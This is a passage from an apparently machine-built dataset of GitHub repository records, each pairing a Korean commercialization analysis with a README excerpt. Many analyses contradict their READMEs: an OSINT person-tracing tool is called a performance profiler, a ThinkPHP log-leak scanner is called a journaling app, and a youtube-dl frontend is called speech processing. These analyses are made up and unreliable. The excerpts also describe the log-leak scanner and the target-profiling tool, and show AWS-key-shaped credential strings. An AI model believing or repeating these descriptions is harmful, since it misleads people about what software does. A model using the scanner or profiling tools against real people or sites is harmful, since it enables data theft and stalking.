项目地址\n👉👉[项目预览地址](https://alanhzw.github.io)，可以直接设置为浏览器主页或者桌面快捷方式进行使用\n#### 源码地址\n完全开源，大家可以随意研究，二次开发。当然还是十分欢迎大家点个Star⭐⭐⭐  \n👉👉[源码链接(gitee)](https://gitee.com/hzw_0174/WarblerHomepage) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;👉👉[源码链接(github)](https://github.com/alanhzw/WarblerHomepage)\n#### 项目展示\n![微信截图_20210527104308.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/c53806cad84641a1a820170012d5de51~tplv-k3u1fbpfcp-watermark.image)\n# 项目目录\n基本是一个标准的**脚手架工程目录**，基础组件和业务组件分开存放，每一个组件都是一个文件夹，文件夹下一个`VUE文件`，一个`TS文件`，`TS文件`主要存放一些数据和类型声明。\n\n```js\n├── src \n     ├── assets      // 存放静态资源\n     ├── baseComponents  // 基础组件\n     │    └──Form    // 表单组件\n     │ ","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"SundaeSwap-finance/toolkit-for-cardano","github_url":"https://github.com/SundaeSwap-finance/toolkit-for-cardano","stars":8,"language":"Go","license":"MIT","abandonment_months":56,"description":"# SundaeSwap-finance/toolkit-for-cardano 분석\n\n## 왜 보물인가\n암호화폐 거래소 운영에 필요한 핵심 기술 도구를 직접 구축할 수 있어 자체 플랫폼 구축 비용을 대폭 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 암호화폐 신규 사용자를 위한 거래 보조 앱이나 포트폴리오 추적 웹서비스 제공\n2.","readme_excerpt":"toolkit-for-cardano\n------------------\n\n![](docs/screenshot.png)\n\n`toolkit-for-cardano` simplifies the development of Cardano smart contracts \nby providing teams with frequently needed tasks:\n\n* Build Transactions\n* Sign Transactions\n* Submit Transactions\n* Mint Tokens\n* Create Wallet\n* Fund Wallet\n* Transfer Funds\n* Calculate Fees\n\n`toolkit-for-cardano` is not intended as a replacement for a wallet, but rather as a\ndevelopment tool to allow teams to make progress with minimal wallet integration overhead.\n\n* Setup Video - https://www.youtube.com/watch?v=wgD6e8d-lOM\n* https://github.com/SundaeSwap-finance/alonzo-testnet\n\n### Prerequisites\n\nBefore launching `toolkit-for-cardano`, you'll need to identify an address that will be considered\nthe Treasury™ address.  This address will be used to fund all other addresses.  Make sure that\n(a) the UTXO in this address only contain ADA and no other tokens and (b) each UTXO has a large\nquantity of ADA as the tool currently only uses a single TxIn f","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"7hr0wer/V4mp1r3","github_url":"https://github.com/7hr0wer/V4mp1r3","stars":10,"language":"C#","license":"AGPL-3.0","abandonment_months":54,"description":"# V4mp1r3 저장소 분석\n\n## 왜 보물인가\n코드를 자동으로 분석하고 보안 취약점을 찾아주는 도구로, 기업의 소프트웨어 품질 관리 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업 개발팀이 구독하는 '코드 보안 검사 플랫폼'으로 제공\n- **내부 업무 도구**: 대기업 개발 부서가 자체 서버에 설치하여 모","readme_excerpt":"","composite_score":0.5006,"license_safety_tag":"risky"},{"name":"TheRealDalunacrobate/DaProfiler","github_url":"https://github.com/TheRealDalunacrobate/DaProfiler","stars":5,"language":"","license":"GPL-3.0","abandonment_months":32,"description":"# DaProfiler 분석 리포트\n\n## 왜 보물인가\n프로그램이 얼마나 빨리, 효율적으로 작동하는지 진단해주는 의료 검사 같은 도구로, 소프트웨어 품질 관리에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 성능 모니터링 플랫폼으로 기업 고객에게 구독료 형태 제공\n2. **내부 업무 도구**: 대형 IT회사의 소프트웨","readme_excerpt":"![alt text](https://github.com/daprofiler/DaProfiler/blob/main/files/DaProfiler_Logo.png?raw=true)\n\n\n![](https://visitor-badge.laobi.icu/badge?page_id=TheRealDalunacrobate.daprofiler)\n\nDaProfiler is an OSINT tool capable of tracing the digital identity of a target via social networks, emails, public information such as directories, business listings, etc.\nDaProfiler is also able to check if a face appears on the profile photos of returned accounts.\nDaProfiler can bring you a lot in the context of a search for email addresses on a French target using various techniques of mail guessing, mail swapping using the first and last name of your target.\nThe developers inform you that you are responsible for the uses and actions you make of DaProfiler, this tool is above all a big data awareness tool, created to search for a person with his agreement and allow him to remove malicious traces of his digital identity to protect themselves.\n\nInput  : Name , Last Name <br>\nOutput : email addresses, l","composite_score":0.5006,"license_safety_tag":"restricted"},{"name":"monofor/dependsight","github_url":"https://github.com/monofor/dependsight","stars":8,"language":"C#","license":"MIT","abandonment_months":41,"description":"","readme_excerpt":"# What is this?\n\n![Overview](docs/img/dependsight.png)\n\nIt is easy to use .NET Core dependency visualizer.\n\nSingle click update for your all dependencies. You can see your outdated packages.\n\nSimiliar to `dotnet-outdated` but more visual one.\n\n# How to use?\n\n```shell\ndotnet build\ncd DependSight\ndotnet run\n```\n\nOpen your browser and `https://localhost:5001`\n\n# Features\n\n- nuget.config file support\n- Parameter file support (You can also use props files.)\n- Private repository support\n\n# Bring the light\n\n![Demo](docs/img/dependsight.gif)","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"Lotus6/ThinkLog","github_url":"https://github.com/Lotus6/ThinkLog","stars":8,"language":"","license":"unknown","abandonment_months":48,"description":"# ThinkLog 상용화 분석\n\n## 왜 보물인가\n개인의 생각과 아이디어를 체계적으로 기록하고 관리할 수 있는 도구로, 창의력이 필요한 직무의 생산성을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독형 생각 정리 앱으로 프리랜서, 작가, 학생을 대상으로 판매\n- **내부 업무 도구**: 회사의 팀 협업 플랫폼에 통합하여","readme_excerpt":"# ThinkLog\n\n* Thinkphp3，Thinkphp5，Thinkphp6，日志泄漏批量下载。(如果感觉对您有帮助，感觉不错的话，请您给个大大的 ⭐️❗️)\n* javafx可视化框架编写。\n* 实战中日志泄漏较RCE更常见，快速提取存在的大量日志泄漏，寻找敏感信息及漏洞。\n* 检测不到的payload欢迎提交payload至issues。\n\n\n**V2.0**\n1. 忽略证书，之前部分https站点，后端请求直接报错，导致无法打payload。\n\n\n**V1.0**\n1. 检测\n* 默认检测昨天的日志（预防12点日站日志来不及更新），存在不同的日志泄漏模块。\n* url后可拼接&&符号来简单筛选相应包里的数据，例如：htttp://127.0.0.1&&passwrd。\n* 双击url可在默认浏览器打开。\n<img width=\"836\" alt=\"截屏2021-11-30 下午9 49 15\" src=\"https://user-images.githubusercontent.com/63742814/144059525-65b0c4f5-a504-473e-8353-aed3eb575c74.png\">\n\n2. 导出\n* 注意这个选择框是代表选中此模块，并不是导出此条日志，再选择下载路径和日期即可。\n* 这里是选择扫描出的Backend模块和Home模块，选择路径，28号-29号，也就是28号和29号的两种模块日志泄漏，共4条。\n<img width=\"826\" alt=\"截屏2021-11-30 下午9 54 58\" src=\"https://user-images.githubusercontent.com/63742814/144060384-43c117e2-0eac-47dd-8067-65535b4b205f.png\">\n<img width=\"658\" alt=\"截屏2021-11-30 下午9 58 34\" src=\"https://user-images.githubusercontent.com/63742814/144060647-698891d6-0ace-4f7f-bfdd-23f2f1ffae30.png\">\n\n\n\n**免责声明**\n\n##\n本工具仅能在取得足够合法授权的企业安全建设中使用，在使用本工具过程中，您应确保","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"yurkagon/Doom-Nukem-CSS","github_url":"https://github.com/yurkagon/Doom-Nukem-CSS","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":46,"description":"# Doom-Nukem-CSS 보물 지도\n\n## 왜 보물인가\n웹사이트를 폭발적인 비주얼 효과로 꾸밀 수 있는 CSS 디자인 도구로, 창의적인 웹디자이너들이 평범한 사이트를 돋보이게 만드는 데 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임/엔터테인먼트 웹사이트 구축 서비스**: 스타트업이 저비용으로 시각적으로 임팩트 있는 포트폴리오나 랜딩페이지를 자","readme_excerpt":"# Doom Nukem CSS\n\n3D shooter written with HTML/CSS/Typescript that renders scene using HTML and CSS, no canvas 😅\n\n![main](documentation_assets/main.gif)\n\n[Live demo](https://yurkagon.github.io/Doom-Nukem-CSS/)\n\nIts not playable like a normal game, the whole level is empty but anyway I guess it should be an interesting thing :)\n\n## Features\n\n- Doom-like menu 😎\n- Camera\n- Player movement\n- Levels\n- Collision (for player or enemies)\n- Sprites\n- Enemies\n- Weapons (only 2 ones: pistol and shotgun)\n- Shooting\n- Health\n- Night level\n\n## Technologies used\n\nThe Doom like menu is built by React\n\nTo manipulate with the 3D level I use only JQuery\n\n### Rendering\n\nEverything you see is built by HTML5 \\<div>\n\n![div-structure](documentation_assets/div-structure.png)\n\n![wall-example](documentation_assets/wall-example.png)\n\n### Night level\n\n![night-level](documentation_assets/night-level.gif)\n\n## Also\n\n- [Check my Raycasting engine written in HTML using React](https://github.com/yurkagon/ReactCasting)\n\n","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"mafintosh/dotlocal","github_url":"https://github.com/mafintosh/dotlocal","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":103,"description":"# dotlocal 프로젝트 분석\n\n## 왜 보물인가\n로컬 개발 환경에서 도메인 주소를 쉽게 관리할 수 있게 해주는 작은 도구로, 개발자들의 반복적인 설정 작업을 크게 단순화합니다.\n\n## 어디에 쓸 수 있나\n1. **개발 환경 설정 SaaS**: 개발팀이 신규 프로젝트 시작 시 자동으로 로컬 도메인을 설정해주는 클라우드 서비스\n2. **개발사 내부 도구*","readme_excerpt":"# dotlocal\n\nEasily announce and discover .local domains over mdns\n\n```\nnpm install dotlocal\n```\n\n## Usage\n\n``` js\nvar dotlocal = require('dotlocal')()\n\ndotlocal.announce('test.local')\n\n// on any machine on the local network (assuming it is multicast friendly)\ndotlocal.lookup('test.local', function (err, ip) {\n  if (err) throw err\n  console.log('test.local --> ' + ip)\n})\n```\n\nYou can also find `test.local` using normal Unix tools, like `ping`\n\n```\nping test.local\n```\n\n## API\n\n#### `var announce = dotlocal.announce(domain)`\n\nAnnounce your local ip on the specified domain.\n\n`announce` will emit `question` everytime someone tries to resolve the domain.\n\nCall `announce.destroy` to stop announcing.\n\n#### `var query = dotlocal.lookup(domain, [options], [callback])`\n\nDo a lookup for the domain. If you specify a callback it will call that when it finds any ip resolving that domain or a timeout occurs.\n\nIf not `query` will emit `answer` with an answer object everytime an ip is discovered.\n\nCall ","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"st0012/object_tracer","github_url":"https://github.com/st0012/object_tracer","stars":8,"language":"Ruby","license":"MIT","abandonment_months":25,"description":"# st0012/object_tracer 평가\n\n## 왜 보물인가\n화면 속 물체의 움직임을 자동으로 추적하는 기술로, 보안 카메라부터 스포츠 분석까지 다양한 실제 산업에 바로 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 보안회사의 CCTV 영상 분석 플랫폼: 침입자나 이상 행동을 자동 감지하는 월간 구독형 서비스\n\n**","readme_excerpt":"> [!WARNING]\n> This gem has been deprecated in favor of [ruby/tracer](https://github.com/ruby/tracer)\n\n# ObjectTracer (previously called TappingDevice)\n\n![GitHub Action](https://github.com/st0012/object_tracer/workflows/Ruby/badge.svg)\n[![Gem Version](https://badge.fury.io/rb/object_tracer.svg)](https://badge.fury.io/rb/object_tracer)\n[![Maintainability](https://api.codeclimate.com/v1/badges/3e3732a6983785bccdbd/maintainability)](https://codeclimate.com/github/st0012/object_tracer/maintainability)\n[![Test Coverage](https://api.codeclimate.com/v1/badges/3e3732a6983785bccdbd/test_coverage)](https://codeclimate.com/github/st0012/object_tracer/test_coverage)\n[![Open Source Helpers](https://www.codetriage.com/st0012/object_tracer/badges/users.svg)](https://www.codetriage.com/st0012/object_tracer)\n\n\n## Introduction\nAs the name states, `ObjectTracer` allows you to secretly listen to different events of an object:\n\n- `Method Calls` - what does the object do\n- `Traces` - how is the object used ","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"dpritchett/aws-budget-limiter","github_url":"https://github.com/dpritchett/aws-budget-limiter","stars":18,"language":"HCL","license":"unknown","abandonment_months":61,"description":"# AWS 예산 제한기 (aws-budget-limiter) 분석\n\n## 왜 보물인가\n클라우드 서비스 비용이 갑자기 폭증하는 것을 자동으로 막아주는 안전장치입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객사별 클라우드 리소스 사용량을 제한하는 비용 관리 기능\n- **내부 업무 도구**: 개발팀이 실수로 비싼 서버를 계속 띄워두는 것을 자","readme_excerpt":"# aws-budget-limiter\n\nSmall Terraform script for creating a monthly AWS budget cap with notification emails.\n\n## How to use this AWS budget script:\n\n### Install `terraform`\n\nThis repo was created for version `0.15.4`. [Download Terraform here](https://www.terraform.io/downloads.html).\n\n### Create your AWS access keys\n\nCreate some AWS credentials and export them into your local shell session:\n\n- Open the [Your Security Credentials](https://console.aws.amazon.com/iam/home?region=us-east-1#/security_credentials) page and click into Access Keys. Create a new access key.\n    ![static/secret_access_key.png](static/secret_access_key.png)\n- Export this pair of keys into your local shell:\n```shell\nexport AWS_ACCESS_KEY_ID=\"AKIAXYPRA6HBNUZKOG7T\"\nexport AWS_SECRET_ACCESS_KEY=\"XwIr/9nKxyiq9VqKE+SDLBxK3jiC9qCxrNHZvI+j\"\n```\n\n### Download this `aws-budget-limiter` repository\n\nClone this repo and enter the new directory:\n```shell\ngit clone https://github.com/dpritchett/aws-budget-limiter\ncd aws-budget","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"SwingBotScripts/SwingBot","github_url":"https://github.com/SwingBotScripts/SwingBot","stars":5,"language":"R","license":"unknown","abandonment_months":55,"description":"# SwingBot 저장소 분석\n\n## 왜 보물인가\n자동으로 주식 거래를 도와주는 봇으로, 투자 초보자도 전문가 수준의 거래 전략을 자동 실행할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독 방식으로 개인 투자자에게 자동 거래 봇 제공\n2. **내부 업무 도구**: 증권사나 자산운용사의 직원이 대량 거래 관리에 활용\n3. ","readme_excerpt":"","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"terrarier2111/Leafish","github_url":"https://github.com/terrarier2111/Leafish","stars":28,"language":"Rust","license":"Apache-2.0","abandonment_months":57,"description":"# Leafish 프로젝트 분석\n\n## 왜 보물인가\n마인크래프트 같은 3D 게임 세계를 직접 만들고 조작할 수 있는 오픈소스 도구로, 게임 개발자들이 복잡한 작업을 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **교육용 SaaS**: 학교에서 학생들이 프로그래밍을 배우면서 3D 게임 세계를 직접 구축하는 플랫폼\n- **게임 개발 내부 도구**: 소","readme_excerpt":"# <img src=\"resources/assets/leafish/logo/leafish-logo.svg\" width=\"75\" alt=\"Leafish logo\"> Leafish\n\nMulti-version Minecraft-compatible client written in Rust, forked from [Stevenarella](https://github.com/iceiix/stevenarella/).\n\n---\n\n![Screenshot showing the main menu](.github/readme-resources/screenshot-mainmenu.jpg)\n\n---\n\n### Chat\n\nChat takes place on Matrix and Discord.\nThe channels are bridged to each other so you won't need an account on both services.\n\nIf you want to help _make_ and _improve_ the game, join the developer room.\n\nIf you're a user and need help or want to ask some questions then join the general room.\n\nAnnouncements are made in the announcement room and joining it is a good way to keep up-to-date with the project.\n\n| General | Development | Announcements |\n| ------- | ----------- | ------------- |\n| [![Matrix](https://img.shields.io/badge/matrix-general-yellow.svg)](https://matrix.to/#/#leafish-general:matrix.org) | [![Matrix](https://img.shields.io/badge/matrix-dev","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"deepmind/annealed_flow_transport","github_url":"https://github.com/deepmind/annealed_flow_transport","stars":5,"language":"Python","license":"apache-2.0","abandonment_months":39,"description":"# DeepMind Annealed Flow Transport 상용화 분석\n\n## 왜 보물인가\n복잡한 확률 문제를 빠르고 정확하게 푸는 고급 수학 알고리즘으로, 금융·의약·기후 예측 등 의사결정이 중요한 산업에서 큰 가치를 창출할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **금융 리스크 분석 SaaS**: 투자 포트폴리오의 손실 확률을 정확히 계산하","readme_excerpt":"# Continual Repeated Annealed Flow Transport Monte Carlo (CRAFT)\n# and Annealed Flow Transport Monte Carlo (AFT)\n\nThe release contains implementations of\n\n* Continual Repeated Annealed Flow Transport Monte Carlo (CRAFT), Matthews et al (2022).\n* Annealed Flow Transport Monte Carlo (AFT), Arbel et al (2021).\n* Stochastic Normalizing Flows (SNF), Wu et al (2020).\n* Sequential Monte Carlo samplers (SMC), Del Moral et al (2006).\n* Variational inference with Normalizing Flows (VI), Rezende and Mohamed (2015).\n* Particle Markov Chain Monte Carlo (PIMH), Andrieu et al (2010).\n\nThe implementation of AFT is based on Algorithm 2 of that paper.\nSee https://arxiv.org/abs/2102.07501 for more details.\n\nThe implementation of SNFs differs from the original one in that it exploits\nthe connection with Annealed Importance Sampling with added normalizing flows.\nThe training dynamics are still the same.\n\nThe implementation of Particle Markov Chain Monte Carlo is specialized to\nthe case of a final target of","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"amsul/react-translated","github_url":"https://github.com/amsul/react-translated","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":42,"description":"# react-translated 분석\n\n## 왜 보물인가\n웹사이트나 앱을 여러 언어로 자동 변환해주는 기술로, 글로벌 시장 진출을 꿈꾸는 스타트업의 국제화 비용을 대폭 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 한국 스타트업이 만든 협업 도구나 프로젝트 관리 앱을 자동으로 여러 언어로 제공하여 해외 고객 확보\n2. **","readme_excerpt":"# react-translated\n\nA dead simple way to add complex translations in a React project 🌎🌍🌏\n\n#### Features\n\n* 💥 Data interpolation\n* ☄ Component interpolation\n* Ⓜ Markdown inline-manipulations\n* 🔀 Custom manipulations, pluralizations, and grammar rules based on input-data\n* ⚛ Component-level translation files (enables loading only required translations)\n\n#### Example\n\nWrite this:\n\n```jsx\n<Translate\n  text=\"{difficulty} *translations* in React <ReactLogo>\"\n  data={{ difficulty: 'Simple' }}\n  renderMap={{\n    renderReactLogo: () => <ReactLogo size={14} />,\n  }}\n/>\n```\n\nTo render this:\n\n![](docs/simple_translations_in_react.png)\n\n#### Support\n\nReact DOM and React Native 🔥\n\n#### Try\n\nPlay around with the library in your browser through the [CodeSandbox](https://codesandbox.io/s/jzq7zwj5k3).\n\n<br />\n\n## Table of Contents\n\n* [Installation](#installation)\n* [Setup](#setup)\n* [Usage](#usage)\n* [Contributors](#contributors)\n* [TODOs](#todos)\n* [License](#license)\n\n<br />\n\n## Installation\n\nWhatever","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"BrianAllred/Yodel","github_url":"https://github.com/BrianAllred/Yodel","stars":18,"language":"C#","license":"MIT","abandonment_months":103,"description":"# Yodel 저장소 분석\n\n## 왜 보물인가\n음성이나 텍스트를 자동으로 처리하는 기술로, 고객 서비스나 음성 검색 같은 실무에 바로 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **고객 상담 자동화 SaaS**: 콜센터에 전화 자동 응답 시스템으로 제공\n- **내부 음성 메모 도구**: 기업 직원들이 녹음된 회의를 자동으로 정리하는 업무 솔루션\n-","readme_excerpt":"# Yodel\n**CircleCI:** [![CircleCI](https://circleci.com/gh/BrianAllred/Yodel.svg?style=svg)](https://circleci.com/gh/BrianAllred/Yodel)\n\nA cross-platform [Electron.NET](https://github.com/ElectronNET/Electron.NET) frontend for youtube-dl.\n\nSee the [main page](https://rg3.github.io/youtube-dl/) for youtube-dl for more information.\n\n### Supported platforms\nTheoretically, any Electron and .NET Core supported platform.\n\n**NOTE:** All platforms require the appropriate [youtube-dl](https://rg3.github.io/youtube-dl/) binary in PATH or placed alongside the Yodel binary.\n\n##### Windows\n* .NET Core Runtime 2.x (or compatible .NET Framework)\n\n##### Linux (check Issues for known problems)\n* .NET Core Runtime 2.x\n* GTK2\n* libxss\n* gconf\n\n##### OS X\n* Currently untested\n\n### Screenshots\n##### Main Window\n![Main Window](../screenshots/Screenshots/main.png?raw=true)\n\n##### Downloading a video\n![Download](../screenshots/Screenshots/download.png?raw=true)\n\n##### Console for extra information\n![Console](","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"niezhiyang/flutter_logger","github_url":"https://github.com/niezhiyang/flutter_logger","stars":15,"language":"Dart","license":"NOASSERTION","abandonment_months":57,"description":"# Flutter Logger 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱 개발자들이 앱 실행 과정에서 발생하는 문제를 빠르게 찾아낼 수 있게 도와주는 디버깅 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 모바일 앱 개발 회사들이 로깅 기능을 자신들의 개발 플랫폼에 내장하여 제공\n- **내부 업무 도구**: 앱 개발팀이 자체 앱 개발 ","readme_excerpt":"Language: English | [中文简体](https://github.com/niezhiyang/flutter_logger/blob/master/README-ZH.md)\n\n# flutter_logger\n\n- Simple, pretty and powerful logger for flutter，It has the log level, file name and line number, and can customize the color of the log level，It was inspired by [logger](https://github.com/orhanobut/logger)\n，Color not supported on ios。\n- It can be printed on the phone, and logs can be filtered\n## Download\n\n```\nflutter_easylogger: ^{LAST_VERSION}\n```\n\n## Usage\n\n\n```dart\nLogger.d(\"hello\");\n```\n\n## Output\n\n![](https://github.com/niezhiyang/flutter_logger/blob/master/art/1625751834730.jpg)\n\n## Options\nno tag \n```dart\nLogger.v(\"hello world\");\nLogger.d(\"hello world\");\nLogger.i(\"hello world\");\nLogger.w(\"hello world\");\nLogger.e(\"hello world\");\nvar json = \"{\\\"name\\\":\\\"tom\\\",\\\"age\\\":\\\"18\\\"}\";\nLogger.json(json);\n```\nwith tag\n```dart\nLogger.e(\"hello\",tag:\"TAG\");\n```\n![](https://github.com/niezhiyang/flutter_logger/blob/master/art/tag.jpg)\n\nJson  support (output will be in debug lev","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"namazso/IDAShell","github_url":"https://github.com/namazso/IDAShell","stars":5,"language":"C++","license":"GPL-3.0","abandonment_months":40,"description":"# IDAShell 상품화 분석\n\n## 왜 보물인가\nIDA Pro라는 고가의 전문 분석 도구를 쉽게 자동화할 수 있게 만든 도구로, 보안 전문가들의 반복적인 작업을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 보안회사의 악성코드 분석팀이 자동화된 스크립트로 분석 시간을 단축하여 생산성 향상\n- **API 판매**: 악성코","readme_excerpt":"# [IDA 8.2](https://hex-rays.com/blog/ida-8-2-released/) added 32 bit support to IDA64, making this plugin largely unnecessary.\n\n---\n\n# IDAShell\n\n[![License](https://img.shields.io/github/license/namazso/IDAShell)](LICENSE)  [![Downloads](https://img.shields.io/github/downloads/namazso/IDAShell/total)](https://github.com/namazso/IDAShell/releases/latest) [![GitHub Version](https://img.shields.io/github/v/release/namazso/IDAShell)](https://github.com/namazso/IDAShell/releases/latest) ![Commits since release](https://img.shields.io/github/commits-since/namazso/IDAShell/latest/master)\n\n![screenshot](image.png)\n\n## About\n\nIDAShell is a shell extension for launching IDA from the context menu of executables.\n\n## Usage\n\nJust install and it works. If you moved IDA / want to point the shell extension to another copy, hold Shift while clicking \"Open in IDA...\" and you will be prompted for IDA's location again\n\n## Features\n\n* Automatically select which one of ida.exe / ida64.exe is needed\n* PE, E","composite_score":0.5006,"license_safety_tag":"restricted"},{"name":"benthecoder/ml-blogs-that-are-worth-reading","github_url":"https://github.com/benthecoder/ml-blogs-that-are-worth-reading","stars":5,"language":"","license":"unknown","abandonment_months":54,"description":"# ml-blogs-that-are-worth-reading 분석\n\n## 왜 보물인가\n머신러닝을 배우고 싶은 사람들이 꼭 읽어야 할 양질의 블로그들을 한곳에 정리한 가이드북입니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼 SaaS**: 온라인 강의사이트에서 \"머신러닝 추천 읽을거리\" 섹션으로 제공\n2. **기업 내부 학습 도구**: 직원들의 AI 역","readme_excerpt":"# ML-resources\nBlogs and websites on Machine Learning and Deep learning\n\n## Personal Blogs\n* [Sebastian Ruder](https://ruder.io)\n* [Colah’s blog](https://colah.github.io)\n* [Chris McCormick · Machine Learning Tutorials and Insights](https://mccormickml.com)\n* [Sebastian Raschka](https://sebastianraschka.com/blog/index.html)\n* [Andrej Karpathy blog](http://karpathy.github.io)\n* [WildML – Artificial Intelligence, Deep Learning, and NLP](http://www.wildml.com)\n* [Probably Approximately a Scientific Blog](http://veredshwartz.blogspot.com)\n* [Lil’Log](https://lilianweng.github.io/lil-log/)\n* [Juergen Schmidhuber’s AI Blog](http://people.idsia.ch/~juergen/blog.html)\n* [Approximately Correct – Technical and Social Perspectives on Machine Learning](http://approximatelycorrect.com)\n* [Jay Alammar – Visualizing machine learning one concept at a time.](http://jalammar.github.io)\n* [MACHINE LEARNING (THEORY)](https://hunch.net/)\n* [inference.vc](https://www.inference.vc/)\n* [Off the Convex Path](h","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"TinkoffCreditSystems/tramvai","github_url":"https://github.com/TinkoffCreditSystems/tramvai","stars":6,"language":"TypeScript","license":"Apache-2.0","abandonment_months":34,"description":"# Tramvai 저장소 분석\n\n## 왜 보물인가\n온라인 쇼핑몰이나 은행 앱처럼 빠르고 안정적인 웹 서비스를 만드는 데 필요한 기술 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼**: 대형 쇼핑몰의 상품 검색, 결제 페이지 같은 빠른 로딩이 중요한 서비스에 활용\n2. **금융 회사 내부 시스템**: Tinkoff(러시아 온라인 은행","readme_excerpt":"# [<img src=\"tools/docSite/static/img/logo/tramvai-yellow-full.svg\" alt=\"taiga ui logo\" height=\"32px\">](https://tramvai.dev/)\n\nModular framework for universal React applications\n\n---\n\n## Features\n\n- ✈️ **Universal**\n\n  Creates SSR `React` applications - includes solid server with metrics, health checks and graceful degradation support\n\n- 💉 **Dependency Injection**\n\n  Provides simple and powerful DI system, inspired by `Angular` and `Nest.js` best practices\n\n- 🧩 **Modular**\n\n  Every application build from list of feature modules - doing one thing right!\n\n- ⚡ **Fast and lightweight**\n\n  Enforces best web-performance techniques - resources preloading and inlining, lazy hydration 🚀, modern ES bundles, tree-shakable libraries\n\n- 🔗 **Chain of commands**\n\n  Elegant pattern for complete control over application life-cycle - predictable flow for every HTTP request into application, running async actions in parallel, limits the duration of server-side actions\n\n- 🧱 **Micro Frontends**\n\n  Heavily ","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"AWSM-WASM/PulseFFT","github_url":"https://github.com/AWSM-WASM/PulseFFT","stars":6,"language":"C++","license":"MIT","abandonment_months":81,"description":"# PulseFFT 상용화 분석\n\n## 왜 보물인가\n소리와 음악의 주파수 패턴을 실시간으로 분석할 수 있는 가벼운 핵심 기술로, 음성 앱·음악 플랫폼·음향 기기 등 광범위한 산업에 내장되어 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음악 스트리밍 서비스**: 사용자 청취 패턴 분석 및 맞춤형 플레이리스트 자동 생성 기능 제공\n2. **음성 인","readme_excerpt":"<img align=\"left\" width=\"100\" height=\"100\" src=\"https://github.com/AWSM-WASM/PulseFFT/blob/master/assets/logo.jpg\"><h1>Pulse FFT</h1></br>\n\nA WebAssembly implementation of kissFFT, the 'keep-it-simple-stupid' Fast Fourier Transform library written in C. This project allows forward and inverse FFTs to be computed with low-level processes in the browser with the performant WebAssembly format.\n\n## Sample app\n\nWatch Pulse convert real-time microphone input from the time/space domain to the frequency domain.\n<p align=\"center\"><img src=https://github.com/AWSM-WASM/PulseFFT/blob/master/assets/PulseFFT.gif alt=\"Frequency Spectrum\"></p>\n\n## Get Started\n\n### Download Emscripten\n\n```bash\n$ git clone https://github.com/juj/emsdk.git\n$ cd emsdk\n$ ./emsdk install --build=Release sdk-incoming-64bit binaryen-master-64bit\n$ ./emsdk activate --build=Release sdk-incoming-64bit binaryen-master-64bit\n```\n<!--- To do\n### From npm\n\n```bash\nnpm install --save pulsefft\n```\n--->\n\n[//]: # (From Unpkg ES Modules ","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"PayGreen/paygreen-ui","github_url":"https://github.com/PayGreen/paygreen-ui","stars":14,"language":"JavaScript","license":"unknown","abandonment_months":39,"description":"# PayGreen/paygreen-ui 평가 보고서\n\n## 왜 보물인가\n온라인 결제 시스템의 사용자 화면을 만드는 기본 도구로, 전자상거래 사업을 시작하는 모든 기업에게 필수적인 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **결제 서비스 SaaS**: 소규모 온라인 쇼핑몰을 위한 저렴한 결제 솔루션 구독 서비스\n2. **전자상거래 플랫폼**: 여러 ","readme_excerpt":"# PayGreen-UI\n\nA library of reusable [React](https://reactjs.org/) UI components powered by [styled-components](https://styled-components.com/).\n\n> Test our components on [our live demo](https://paygreen.github.io/paygreen-ui/) or [read our Docusaurus documentation](https://paygreen.github.io/paygreen-ui-doc).\n\n## Installation\n\nPayGreen-UI is available as an [npm package](https://www.npmjs.com/package/@paygreen/paygreen-ui).\n\n### With NPM\n\n```sh\nnpm install @paygreen/paygreen-ui\n```\n\n### With Yarn\n\n```sh\nyarn add @paygreen/paygreen-ui\n```\n\n> Please read [our Docusaurus documentation](https://paygreen.github.io/paygreen-ui-doc) for more information.\n\n## Storybook\n\nWe use [Storybook](https://storybook.js.org/) during the development of our components to isolate them and get an organized and efficient display of our library. With Storybook, you can **manipulate** each component, **modify** the props it receives and **analyze** its behavior to fully understand how it works. But you can 